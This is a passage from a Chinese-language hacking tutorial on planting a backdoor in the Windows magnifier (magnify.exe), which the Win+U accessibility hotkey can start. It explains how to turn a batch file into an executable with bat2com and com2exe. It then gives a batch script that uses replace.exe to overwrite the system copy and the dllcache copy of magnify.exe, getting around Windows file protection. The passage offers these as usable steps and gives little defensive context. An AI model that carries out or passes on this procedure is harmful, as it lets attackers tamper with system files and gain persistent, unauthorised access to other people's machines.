(2).文件格式转换
　　因为批处理文件magnify.bat的后缀是bat，必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件，当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。
　　打开命令行，进入bat2com、com2exe工具所在的目录，然后运行命令“bat2com magnify.bat”将magnify.bat转换成magnify.com，继续运行命令“com2exe magnify.com”将magnify.com转换成magnify.exe，这样就把批处理文件转换成和放大镜程序同名的程序文件。(图3)

(3).放大镜文件替换

　　下面就需要用构造的magnify.exe替换同名的放大镜程序文件，由于Windows对系统文件的自我保护，因此不能直接替换，不过Windows提供了一个命令replace.exe，通过它我们可以替换系统文件。另外，由于系统文件在%Windir%\system32\dllcache中有备份，为了防止文件替换后又重新还原，所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下，我们可以通过一个批处理即可实现文件的替换。

　　@echo off

　　copy %Windir%\system32\dllcache\magnify.exe nagnify.exe

　　copy %Windir%\system32\magnify.exe nagnify.exe

　　replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache

　　replace.exe %Windir%\magnify.exe %Windir%\system32

　　exit

　　上面批处理的功能是，首先将放大镜程序备份为nagnify.exe，然后用同名的构造程序将其替换。(图4)